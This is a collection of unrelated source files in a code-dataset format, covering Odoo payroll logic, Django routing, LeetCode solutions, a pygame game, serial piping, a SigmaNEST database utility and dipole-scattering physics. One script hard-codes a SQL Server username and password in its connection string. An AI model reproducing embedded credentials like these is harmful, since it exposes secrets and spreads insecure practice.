fields.function(_get_user_department, type='many2one', relation='hr.department', string='Department',\n store={\n 'hr.advance.payment': (lambda self, cr, uid, ids, c={}: ids, ['employee_id'], 10),\n }, readonly=True),\n \n 'state': fields.selection([('draft','Draft'),('confirmed','Confirmed'),('cancel','Cancelled')], 'State', readonly=True)\n }\n \n def _get_currency(self, cr, uid, context=None):\n res_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n return res_id\n \n _defaults = {\n 'date': time.strftime(DEFAULT_SERVER_DATE_FORMAT),\n 'user_id': lambda obj, cr, uid, context: uid,\n 'currency_id': _get_currency,\n 'exchange_rate': 1.0,\n 'state': 'draft'\n }\n def _check_amount(self, cr, uid, ids,context=None):\n for payment in self.browse(cr, uid, ids, context=context):\n if payment.amount <= 0:\n return False\n return True\n _constraints = [\n (_check_amount,\"Amount must be greater than 0\",['amount']),\n ]\n \n def action_confirm(self, cr, uid, ids, context=None):\n payslip_pool = self.pool.get('hr.payslip')\n for line in self.browse(cr, uid, ids):\n cr.execute('''\n SELECT id, number, state\n FROM hr_payslip\n WHERE employee_id=%s AND date_to >= '%s' AND date_from <='%s' \n '''%(line.employee_id.id, line.date, line.date))\n res = cr.fetchall()\n for payslip in res:\n if payslip[2] == 'done':\n raise osv.except_osv(_('Warning!'),_(\"Payslip number '%s' has been paid!\\n You are not able to confirm this Payment!\")%(payslip[1]))\n# elif payslip[2] != 'cancel':\n# cr.execute('''\n# INSERT INTO hr_advance_payment_payslip_rel(payslip_id,payment_id) VALUES(%s,%s)\n# '''%(payslip[0],line.id))\n #Thanh: Recompute Related Payslip to update Advanced Amount\n self.write(cr, uid, [line.id], {'state':'confirmed','approved_by':uid})\n if res:\n payslip_pool.compute_sheet(cr, uid, [x[0] for x in res], context)\n return True\n \n def action_cancel(self, cr, uid, ids, context=None):\n payslip_pool = self.pool.get('hr.payslip')\n for line in self.browse(cr, uid, ids):\n cr.execute('''\n SELECT hp.id, hp.number, hp.state\n FROM hr_advance_payment_payslip_rel app join hr_payslip hp on app.payslip_id = hp.id\n WHERE app.payment_id = %s\n '''%(line.id))\n res = cr.fetchall()\n for payslip in res:\n if payslip[2] == 'done':\n raise osv.except_osv(_('Warning!'),_(\"Payslip number '%s' has been paid!\\n You are not able to cancel this Payment!\")%(res[0][0]))\n elif payslip[2] != 'cancel':\n cr.execute('''\n DELETE FROM hr_advance_payment_payslip_rel WHERE payment_id=%s\n '''%(line.id))\n #Thanh: Recompute Related Payslip to update Advanced Amount\n self.write(cr, uid, [line.id], {'state':'cancel'})\n if res:\n payslip_pool.compute_sheet(cr, uid, [x[0] for x in res], context)\n return True\n \n def set_to_draft(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'draft','user_id':uid,'approved_by':False})\n return True\n \n def write(self, cr, uid, ids, vals, context=None):\n comp_currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n if vals.get('currency_id', False) and vals['currency_id'] == comp_currency_id:\n vals['exchange_rate'] = 1.0\n return super(hr_advance_payment, self).write(cr, uid, ids, vals, context)\n \n def create(self, cr, uid, vals, context=None):\n comp_currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n if vals.get('currency_id', False) and vals['currency_id'] == comp_currency_id:\n vals['exchange_rate'] = 1.0\n return super(hr_advance_payment, self).create(cr, uid, vals, context)\n \nhr_advance_payment()","sub_path":"general_l10n_vn_hr_payroll/hr_advance_payment.py","file_name":"hr_advance_payment.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614288710","text":"# Setter und Getter-Methode für self.note via property-Decorator\n\n\nclass Student:\n\n def __init__(self, matrnr):\n self.matrikelnummer = matrnr\n self.__note = 0\n\n @property\n def note(self):\n if self.__note > 0:\n return self.__note\n else:\n raise Exception('Noch nicht benotet.')\n\n @note.setter\n def note(self, note):\n if note >= 1 and note <= 5:\n self.__note = note\n else:\n raise ValueError('Note nicht im erlaubten Bereich!')\n\n\nif __name__ == '__main__':\n hans = Student('14012345')\n hans.note = 12 # change to 1 to see a working example\n print(hans.note)\n","sub_path":"examples/objekte/property-decorator.py","file_name":"property-decorator.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181844694","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'aplikacja'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^about_me/', views.about_me, name='about_me'),\n url(r'^contact/', views.contact, name='contact'),\n url(r'^publications/', views.publications, name='publications'),\n url(r'^for_students/', views.for_students, name='for_students'),\n]","sub_path":"aplikacja/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91640767","text":"import ast, glob, os, re, subprocess \n\nclass MergeMetrics(object):\n '''\n Base Metrics Api implementation\n '''\n def __init__(self):\n self.solmetant = 'solmetant.csv' # solidity metrics antonio file\n self.etherscan_json = self._get_contracts_json()\n\n def _get_contracts_json(self):\n with open('contracts.json', 'r') as f:\n return [ast.literal_eval(line) for line in f]\n\n def get_sol_file_name(self, obj):\n src = os.path.join('./output', obj[\"address\"].replace(\"0x\", \"\")[:2].lower())\n src = \"/\".join([src, obj[\"address\"].replace(\"0x\", \"\")])\n return \"_\".join([src, obj[\"name\"]])\n \n def _write_file_header(self):\n self.outf = open(self.solmetant, 'w')\n self.outf.write('SolidityFile;ETHAddress;ContractName;Type;SLOC;LLOC;CLOC;NF;WMC;NL;NLE;NUMPAR;NOS;DIT;NOA;NOD;CBO;NA;NOI;Avg. McCC;Avg. NL;Avg. NLE;Avg. NUMPAR;Avg. NOS;Avg. NOI;FS;LS;CV;\\n')\n\n def join_etherscan_solmet(self):\n self._write_file_header()\n for obj in self.etherscan_json:\n try:\n fn = \".\".join([self.get_sol_file_name(obj), 'out'])\n lines = open(fn, 'r').readlines()\n except TypeError:\n continue\n try:\n self.outf.write(';'.join([\n lines[1].rstrip(),\n obj['firstseen'],\n obj['lastseen'],\n obj['compiler_version'], '\\n'\n ]))\n except IndexError:\n print(\"fn: \", fn)\n self.outf.close()\n\nif __name__ == \"__main__\":\n m = MergeMetrics()\n m.join_etherscan_solmet()\n #print(m.get_sol_file_name({'address': '0x79a64dbe0a25390fa40a2eb819b934ccc7a06f45', 'name': 'ALLDigitalToken', 'compiler': 'Solidity', 'compiler_version': '0.4.25', 'balance': 0, 'txcount': '1', 'firstse en': '2019-02-26T05:04:06.000Z', 'lastseen': '2019-02-26T05:04:06.000Z'}))\n","sub_path":"examples/join_metrics.py","file_name":"join_metrics.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132747538","text":"# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n def merge(self, intervals):\n if not intervals or len(intervals) < 2:\n return intervals\n intervals.sort(key = lambda x: x.start)\n result = [intervals[0]]\n for x in intervals[1:]:\n current, prev = x, result[-1] # cannot use carry since we have to point to the end of the resulting array\n if current.start <= prev.end:\n prev.end = max(prev.end, current.end)\n else:\n result.append(current)\n return result\n","sub_path":"leetcode/Merge Intervals.py","file_name":"Merge Intervals.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"279928362","text":"# -*- coding: UTF-8 -*-\nimport os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\ninstall_requirements = [\n\t\"Django>=1.8\",\n\t\"argparse>=1.2.1\",\n\t\"requests>=2.6.0\",\n\t\"simplejson>=3.6.5\",\n\t\"jsonfield>=1.0.3\",\n\t\"wsgiref>=0.1.2\"\n]\n\nsetup(\n name='django-gerencianet',\n version='0.1.4',\n packages=['gerencianet'],\n include_package_data=True,\n license='BSD License', # example license\n description='Uma aplicação django para comunicar com o gateway de pagamento Gerencianet',\n long_description=README,\n url='https://github.com/sidneycarlos65/django-gerencianet',\n author='Sidney Machado',\n author_email='sidney.machado@starlinetecnologia.com.br',\n install_requires=install_requirements,\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License', # example license\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n ],\n)\n","sub_path":"pypi_install_script/django-gerencianet-0.1.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211356413","text":"import os\nfrom databaseHelper import DBConnection\n\ndb_file = os.path.expanduser('~/Telenor/mecs.db')\nconnection = DBConnection(db_file)\n\ndef purge():\n drop_events = 'DROP TABLE IF EXISTS events;'\n\n connection.execute_statement(drop_events)\n\ndef setup():\n create_events = \"\"\"CREATE TABLE IF NOT EXISTS events (\n id integer PRIMARY KEY,\n time real,\n node text,\n event integer,\n level text);\"\"\"\n \n connection.execute_statement(create_events)\n\npurge()\nsetup()","sub_path":"consumers/databaseSetup.py","file_name":"databaseSetup.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"479828667","text":"\n\nfrom xai.brain.wordbase.verbs._sabotage import _SABOTAGE\n\n#calss header\nclass _SABOTAGING(_SABOTAGE, ):\n\tdef __init__(self,): \n\t\t_SABOTAGE.__init__(self)\n\t\tself.name = \"SABOTAGING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sabotage\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_sabotaging.py","file_name":"_sabotaging.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471100935","text":"#### For plotting from reawrd values stored in files\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwindow_size=5\ny = np.loadtxt(\"episode_reward.txt\", unpack=True)\ny_new=[y_ for y_ in y if y_!=0]\n\nx=range(len(y_new))\nplt.figure(1)\nplt.plot(x,y_new)\nplt.title('Original Reward')\nplt.xlabel('episodes')\nplt.ylabel('reward per episeodes')\nplt.show()\n\ny_new_smooth=list()\nfor i in range(window_size,len(y_new)-window_size):\n\ty_new_smooth.append((y_new[i-1]+y_new[i-2]+y_new[i-3]+y_new[i-4]+y_new[i]+y_new[i+1]+y_new[i+2]+y_new[i+3]+y_new[i+4])/window_size)\n \nx_smooth=range(len(y_new_smooth))\nplt.figure(2)\nplt.plot(x_smooth,y_new_smooth)\nplt.title('Smoothened Reward')\nplt.xlabel('episodes')\nplt.ylabel('reward per episeodes')\nplt.show()\n\n","sub_path":"S2l/ECCV/Exp2_push3dof/Results/Exp2_0deg_1/plotter_episodes_smoothen.py","file_name":"plotter_episodes_smoothen.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269761726","text":"def remove(file1, file2, n):\r\n myfile1 = open(file1, \"r\")\r\n myfile2 = open(file2, \"w\")\r\n for i in range(1, n+1):\r\n a = myfile1.readline()\r\n x = a.split()\r\n y = x[::]\r\n for i in x:\r\n if i in [\"a\", \"an\", \"the\"]:\r\n y.remove(i)\r\n index = index(i)\r\n y[index] = \" \"\r\n myfile2.writelines(y)\r\n myfile2.close()\r\n\r\n\r\n","sub_path":"Class 12/File_Handling/Text files/lab_act2.py","file_name":"lab_act2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91869051","text":"class Table():\n '''A class to represent a SQuEaL table'''\n def __init__(self, col_names=[], contents=[]):\n ''' (list of str, list of list of str)-> dict\n Set up a new dictionary with given column name(s) and content(s) of the\n column(s)\n REQ: len(col_names) == len(contents)\n REQ: len(contents[i]) == len(contents[j]) (i, j are different indeces)\n '''\n self.col_names = col_names\n self.contents = contents\n\n # initiate an empty dictionary\n dict = {}\n # initiate a variable for index\n index = 0\n\n # use elemental for loop to process each name of the column\n for name in col_names:\n # use if statement to check whether the contents list is empty\n # (empty list evaluates to False)\n if self.contents:\n # add the information to the dictionary in pair\n # (name as key, content as value)\n dict[name] = contents[index]\n # increment the index by 1\n index += 1\n else:\n # let the value be empty for all names (keys) when there are\n # no rows (when contents list is empty)\n dict[name] = []\n\n self.dict = dict\n\n def set_dict(self, new_dict):\n '''(Table, dict of {str: list of str}) -> NoneType\n\n Populate this table with the data in new_dict.\n The input dictionary must be of the form:\n column_name: list_of_values\n '''\n # the original dictionary is replaced by the new dictionary\n self.dict = new_dict\n\n # replace the column name list with an empty list\n self.col_names = []\n # use elemental for loop to append new column names to the list\n for name in new_dict:\n self.col_names.append(name)\n\n # replace the content list with an empty list\n self.contents = []\n # use elemental for loop to append new lists of content to the list\n for key in new_dict:\n self.contents.append(new_dict[key])\n\n def get_dict(self):\n '''(Table) -> dict of {str: list of str}\n\n Return the dictionary representation of this table. The dictionary keys\n will be the column names, and the list will contain the values\n for that column.\n '''\n return self.dict\n\n def num_rows(self):\n ''' (Table) -> int\n return the number of rows of the table\n '''\n # use if statement to check whether the list of contents is empty\n if 0 < len(self.contents):\n # use the fact that every column has the same number of rows\n num_row = len(self.contents[0])\n\n else:\n # assign number of rows to 0 as the column has no rows\n num_row = 0\n\n return num_row\n\n def print_csv(self):\n '''(Table) -> NoneTypea\n Print a representation of table in csv format.\n '''\n # no need to edit this one, but you may find it useful (you're welcome)\n dict_rep = self.get_dict()\n columns = list(dict_rep.keys())\n print(','.join(columns))\n rows = self.num_rows()\n for i in range(rows):\n cur_column = []\n for column in columns:\n cur_column.append(dict_rep[column][i])\n print(','.join(cur_column))\n\n\nclass Database():\n '''A class to represent a SQuEaL database'''\n def __init__(self, table_names=[], tables=[]):\n ''' (Database, list of str, list of Table) -> NoneType\n Set up a database with given table name(s) and table(s)\n REQ: len(table_names) == len(tables)\n '''\n self.table_names = table_names\n self.tables = tables\n\n # initiate an empty dictionary\n dict = {}\n # initiate a variable for index\n index = 0\n # use elemental for loop to process each name of the table\n for name in table_names:\n # add the information to the dictionary in pair\n dict[name] = tables[index]\n # increment the index by 1\n index += 1\n\n self.dict = dict\n\n def set_dict(self, new_dict):\n '''(Database, dict of {str: Table}) -> NoneType\n\n Populate this database with the data in new_dict.\n new_dict must have the format:\n table_name: table\n '''\n # the original dictionary is replaced by the new dictionary\n self.dict = new_dict\n\n # replace the table name list with an empty list\n self.table_names = []\n # use elemental for loop to append new table names to the list\n for name in new_dict:\n self.table_names.append(name)\n\n # replace the table list with an empty list\n self.tables = []\n # use elemental for loop to append new lists of table to the list\n for key in new_dict:\n self.tables.append(new_dict[key])\n\n def get_dict(self):\n '''(Database) -> dict of {str: Table}\n\n Return the dictionary representation of this database.\n The database keys will be the name of the table, and the value\n will be the table itself.\n '''\n return self.dict\n","sub_path":"assignment_3/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567899134","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport os\n\nDATABASE_URL = os.getenv(\"DATABASE_URL\", \"Database url undefined\").replace('postgres', 'postgresql')\n\nengine = create_engine(DATABASE_URL)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\n\nasync def get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n","sub_path":"backend/app/core/models/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567261658","text":"#!/usr/bin/env python\n\nimport argparse\nimport pyodbc\nimport re\nfrom datetime import datetime\n# import xwutils\n\ncs = \"DRIVER={SQL Server};SERVER=HIIWINBL18;UID=SNUser;PWD=BestNest1445;\"\n# sndb_conn = pyodbc.connect(cs + 'DATABASE=ReallyOldArchives')\nsndb_conn = pyodbc.connect(cs + 'DATABASE=SNDBase91')\noys_conn = pyodbc.connect(cs + 'DATABASE=OYSProgramUpdate')\nsndb = sndb_conn.cursor()\noys = oys_conn.cursor()\n\nsheet = re.compile(r'[A-Z]+[0-9]+')\npart = re.compile(r'[0-9]+[A-Z][-|_][A-Z][0-9]+[A-Z]+')\nprog = re.compile(r'[0-9]+$')\nmm = re.compile(r'[0-9]+[A-Z][-][0-9]+')\n\nlast_program = None\n\n# [regexpr, Table, Columns to display, Column to constrain by values]\nqueues = [[sheet, 'Stock', 'SheetName, PrimeCode', 'SheetName'],\n [sheet, 'StockHistory', 'SheetName, ProgramName', 'SheetName'],\n [part, 'Part', 'PartName, WONumber', 'PartName'],\n [part, 'PIP', 'PartName, ProgramName, WONumber', 'PartName'],\n [prog, 'PIP', 'ProgramName, PartName', 'ProgramName'],\n [part, 'PIPArchive', 'PartName, ProgramName, WONumber, ArcDateTime',\n 'TransType=\\'SN102\\' AND PartName'],\n [prog, 'PIPArchive', 'ProgramName, PartName, ArcDateTime',\n 'TransType=\\'SN102\\' AND ProgramName'],\n [mm, 'StockArchive', 'PrimeCode, HeatNumber, ProgramName, ArcDateTime',\n 'PrimeCode'],\n [sheet, 'Program', 'SheetName, ProgramName', 'SheetName'],\n [sheet, 'ProgArchive', 'SheetName, ProgramName, CompDate',\n 'TransType=\\'SN102\\' AND SheetName'],\n [prog, 'StockHistory', 'SheetName, HeatNumber, BinNumber', 'ProgramName']]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('program', nargs='?', default='',\n help='script args: Q, P, UH, US or program name')\n\n args = parser.parse_args()\n arg = args.program.upper()\n\n opts = [['Query SigmaNEST Database', 'Q', query, 'Value: '],\n ['Check Program Status', 'P', get_updated, '\\nProgram :: '],\n ['Update Program Heat Number', 'UH', update_heat, '\\nProgram: '],\n ['Update Sheet Size', 'US', update_size, '\\nSheet Name: ']]\n\n if arg:\n for x in opts:\n if x[1] == arg:\n script, val_str = x[2:]\n break\n else:\n print(get_updated(args.program))\n exit()\n else:\n print('Available Archive Scripts:')\n indexed = enumerate([x[0] for x in opts], start=1)\n print(''.join(['\\n %s::%s' % (i, v) for i, v in indexed]))\n index = int(input('\\nScript to run: '))\n if index > len(opts):\n print('Index out of range')\n exit()\n script, val_str = opts[index - 1][2:]\n\n print('\\n\\n')\n while 1:\n val = input(val_str).upper()\n if not val:\n break\n ret = script(val)\n if ret:\n print(ret + '\\n')\n\n\n sndb_conn.close()\n oys_conn.close()\n\n\n# arg :: Q\ndef query(values):\n q = f\"%%{values.replace('-', '%').replace(' ', '%')}%%\"\n for x in queues:\n cs = f\"SELECT {x[2]} FROM {x[1]} WHERE {x[3]} LIKE '{q}'\"\n sndb.execute(cs)\n ls = []\n for a in sndb.fetchall():\n ls.append(list(a))\n for index, item in enumerate(a):\n if type(item) is datetime:\n item = datetime.strftime(item, '%m/%d/%Y %H:%M')\n ls[-1][index] = item\n if ls:\n lens = [len(max([t[i] for t in ls])) for i, x in enumerate(ls[0])]\n outls = [[x.ljust(lens[i]) for i, x in enumerate(a)] for a in ls]\n\n print(cs)\n for x in outls:\n print(' :: '.join(x))\n print('\\n')\n\n return None\n\n\n# arg :: P\ndef get_updated(prog):\n global last_program\n if last_program and len(prog) < 5:\n stop = 5 - len(prog)\n prog = f'{last_program[:stop]}{prog}'\n print(f'\\x1b[1A\\x1b[2KProgram :: {prog}')\n # up 5, del 1, dn 1, del 1, line return\n print('\\x1b[5A\\x1b[1M\\x1b[1B\\x1b[1M')\n line = f'\\x1b[{len(prog) + 11}C'\n last_program = prog\n\n sndb.execute('SELECT SheetName FROM Program WHERE ProgramName=?', prog)\n temp = sndb.fetchall()\n if temp:\n return line + ' is active'\n\n sndb.execute(\"\"\"SELECT ArcDateTime, TransType FROM ProgArchive WHERE\n ProgramName=?\"\"\", prog)\n temp = sndb.fetchall()\n if not temp:\n return line + ' not found'\n last = max(temp, key=lambda x: x[0])\n if last[1] == 'SN101':\n return line + ' was deleted'\n data = [datetime.strftime(last[0], '%m/%d/%Y %H:%M')]\n oys.execute(\"\"\"SELECT OperatorName FROM CompletedProgram\n WHERE ProgramName=?\"\"\", prog)\n data.append((oys.fetchone() or ('N/A', ''))[0])\n sndb.execute(\"\"\"SELECT HeatNumber, BinNumber, SheetName\n FROM StockHistory WHERE ProgramName=?\"\"\", prog)\n data.extend(list(sndb.fetchone()))\n\n return line + ' was updated ' + ' :: '.join(data)\n\n\n# arg :: UH >> update heat number, PO number and SAP MM if given\ndef update_heat(prog, heat=None, po=None, mm=None):\n sndb.execute(\"\"\"SELECT HeatNumber, BinNumber, PrimeCode\n FROM StockHistory WHERE ProgramName=?\"\"\", prog)\n orig_heat, orig_po, orig_mm = sndb.fetchone()\n heat = heat or input('Heat Number: ').upper() or orig_heat\n po = po or input('PO Number: ').upper() or orig_po\n mm = mm or input('SAP MM: ').upper() or orig_mm\n\n val = input(f'Heat :: {heat}\\nPO :: {po}\\nSAP MM :: {mm}\\n\\nCommit? ')\n if not val or val.upper()[0] != 'Y':\n return None\n\n # update heat, po and sap mm\n sndb.execute(\"\"\"UPDATE StockHistory\n SET HeatNumber=?, BinNumber=?, PrimeCode=?\n WHERE ProgramName=?\"\"\", (heat, po, mm, prog))\n sndb.execute(\"\"\"UPDATE StockArchive\n SET HeatNumber=?, BinNumber=?, PrimeCode=?\n WHERE ProgramName=?\"\"\", (heat, po, mm, prog))\n sndb_conn.commit()\n\n return None\n\n\n# arg :: US >> update sheet size\ndef update_size(sheet, wid=None, len=None):\n sndb.execute('SELECT Width, Length FROM Stock WHERE SheetName=?', sheet)\n db_wid, db_len = sndb.fetchone()\n wid = wid or input('Width: ').strip() or db_wid\n len = len or input('Length: ').strip() or db_len\n area = float(len) * float(wid)\n\n sndb.execute('''\n UPDATE Stock\n SET Width=?, Length=?, Area=?\n WHERE SheetName=?\n ''', (wid, len, area, sheet))\n sndb_conn.commit()\n\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269626767","text":"import pygame\nimport time\nimport constants\nimport spaceship\nimport enemybullet\nimport math\n\n\nclass Enemytype3(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.width = constants.enemytype3width\n self.height = constants.enemytype3height\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.x = x\n self.rect.y = y\n self.image = pygame.image.load(\"dopeenemy3.png\")\n self.image = pygame.transform.scale(self.image, (self.width, self.height))\n self.speedx = constants.enemytype3speed\n self.speedy = constants.enemytype3speed\n self.timer = time.time()\n self.bullettime = constants.enemytype3bullettimer\n self.health = 1\n\n def update(self, player, ebullets, enemies):\n self.rect.x += self.speedx\n if self.speedx > 3:\n self.speedx -= 1\n self.rect.y += self.speedy\n if self.speedy > 2:\n self.speedy -= 1\n if self.speedx < 0 and self.rect.x + self.width < 0:\n enemies.remove(self)\n if self.speedx > 0 and self.rect.x > constants.size[0]:\n enemies.remove(self)\n\n distance = math.sqrt((self.rect.x - player.rect.x)**2 + (self.rect.y - player.rect.y)**2)\n xspeed = constants.enemy1bulletspeed * math.fabs(self.rect.x - player.rect.x)/distance\n yspeed = constants.enemy1bulletspeed * math.fabs(self.rect.y - player.rect.y)/distance\n\n if time.time() - self.timer + 0.0 > constants.enemytype3bullettimer:\n bullet = enemybullet.Enemybullet(self.rect.x + self.width/2 - constants.ebulletwidth/2,\n self.rect.y + self.height, xspeed, yspeed)\n ebullets.add(bullet)\n self.timer = time.time()","sub_path":"Space/enemytype3.py","file_name":"enemytype3.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"563551588","text":"# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys,os,select\nimport serial\nimport time\nser = serial.Serial(sys.argv[1],int(sys.argv[2]))\n\nlast_print=time.time()\n#pad=b'\\x00\\xff'*2\npad=b'\\x00\\xff\\x00\\xff'\n\ndata_len=0\npad_len=0\ntic=time.time()\nwhile 1:\n if sys.argv[3]=='out':\n bs=128\n reader=sys.stdin.buffer\n if len(select.select([sys.stdin],[],[],0)[0])>0:\n data=reader.read(bs)\n ser.write(data)\n data_len+=len(data)\n while ser.out_waiting==0 and 1:\n pad_chunk=pad*1\n ser.write(pad_chunk)\n pad_len+=len(pad_chunk)\n else:\n bs=1\n writer=sys.stdout.buffer\n data=ser.read(bs)\n for i in range(len(pad)):\n if data[-1]==pad[i] and len(data)3:\n to_rate=1.0/3.0/1e3*8\n print('data sent rate: {:5.1f}Kbit/s pad: {:5.1f} total: {:5.1f} '\\\n .format(data_len*to_rate, pad_len*to_rate, (pad_len+data_len)*to_rate),file=sys.stderr)\n tic=time.time()\n data_len=0\n pad_len=0\n\n","sub_path":"stdpipe2.py","file_name":"stdpipe2.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"536185892","text":"from green import *\nfrom dipole import *\nfrom metalens import *\nimport numpy as np\nfrom scipy.special import jv, hankel1\n\npi = np.pi\n\nEPS = 1\n# lambda_ = 826.60\nlambda_ = 620\nr_sph = 100\n\neps1 = 1\neps2 = 1\nk1 = 2 * pi * eps1 ** (1 / 2) / lambda_\nk2 = 2 * pi * eps2 ** (1 / 2) / lambda_\nk0 = 2 * pi / lambda_\n\ntheta_inc = 0\nW_0 = 300000\n\n# polarization vector\nE_in = np.array((np.cos(theta_inc), 0, -np.sin(theta_inc)))\nH_in = np.array((0, 1, 0))\n# wave vector\nw = np.array((k0 * eps1 ** (1 / 2) * np.sin(theta_inc), 0, k0 * eps1 ** (1 / 2) * np.cos(theta_inc)))\n\n\ndef get_alphas(lambda_, r_sph):\n x = 2 * pi * r_sph / lambda_\n kk = 2 * pi / lambda_\n eps = 15.254 + 1j * 0.172\n m = eps ** (1 / 2)\n n = 1\n\n psi_n = (pi * x / 2) ** (1 / 2) * jv(n + 1 / 2, x)\n psi_n_dir = (1 / 2) * (pi / (2 * x)) ** (1 / 2) * jv(n + 1 / 2, x) + (pi * x / 2) ** (1 / 2) * (\n jv(n - 1 / 2, x) - ((n + 1 / 2) / x) * jv(n + 1 / 2, x))\n psi_n_m = (pi * m * x / 2) ** (1 / 2) * jv(n + 1 / 2, m * x)\n psi_n_dir_m = (1 / 2) * (pi / (2 * m * x)) ** (1 / 2) * jv(n + 1 / 2, m * x) + (pi * m * x / 2) ** (1 / 2) * (\n jv(n - 1 / 2, m * x) - ((n + 1 / 2) / (m * x)) * jv(n + 1 / 2, m * x))\n xci_n = (pi * x / 2) ** (1 / 2) * hankel1(n + 1 / 2, x)\n xci_n_dir = (1 / 2) * (pi / (2 * x)) ** (1 / 2) * hankel1(n + 1 / 2, x) + (pi * x / 2) ** (1 / 2) * (\n hankel1(n - 1 / 2, x) - ((n + 1 / 2) / x) * hankel1(n + 1 / 2, x))\n\n a_n = (psi_n * psi_n_dir_m - m * psi_n_m * psi_n_dir) / (xci_n * psi_n_dir_m - m * psi_n_m * xci_n_dir)\n b_n = (m * psi_n * psi_n_dir_m - psi_n_m * psi_n_dir) / (m * xci_n * psi_n_dir_m - psi_n_m * xci_n_dir)\n\n alpha_e = 1j * pi * 6 * a_n / (kk ** 3)\n alpha_m = 1j * pi * 6 * b_n / (kk ** 3)\n\n return alpha_e, alpha_m\n\n\nchi, chi_m = get_alphas(lambda_, r_sph)\n\n\ndef calc_initial_fields(X, Z):\n len_X = len(X)\n len_Z = len(Z)\n electric_initial = np.zeros((len_X, len_Z, 3), dtype=complex)\n magnetic_initial = np.zeros((len_X, len_Z, 3), dtype=complex)\n for i in range(len_X):\n for j in range(len_Z):\n dop = np.exp(1j * np.dot(w, np.array((X[i], 0, Z[j]))))\n electric_initial[i, j] = dop * E_in\n dop_m = np.exp(1j * np.dot(w, np.array((X[i], 0, Z[j])))) / k0\n magnetic_initial[i, j] = dop_m * np.cross(w, E_in)\n return electric_initial, magnetic_initial\n\n\ndef calc_dipoles_fields(particles, X, Z):\n len_X = len(X)\n len_Z = len(Z)\n n = len(particles)\n electric = np.zeros((len_X, len_Z, 3), dtype=complex)\n magnetic = np.zeros((len_X, len_Z, 3), dtype=complex)\n for i in range(len_X):\n for j in range(len_Z):\n e = np.zeros((1, 3), dtype=complex)\n m = np.zeros((1, 3), dtype=complex)\n for t in range(n):\n dipole = particles[t]\n dipole_x = dipole.vector[0]\n dipole_y = dipole.vector[1]\n dipole_z = dipole.vector[2]\n # electric dipoles contribution\n g = green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1, eps1)\n g_m = -1j * k0 * rot_green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1)\n m += np.dot(g_m, dipole.electric)\n e += np.dot(g, dipole.electric)\n # magnetic dipoles contribution\n g = 1j * k0 * rot_green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1)\n g_m = green(X[i], dipole_x, 0, dipole_y, Z[j], dipole_z, k1, eps1)\n e += np.dot(g, 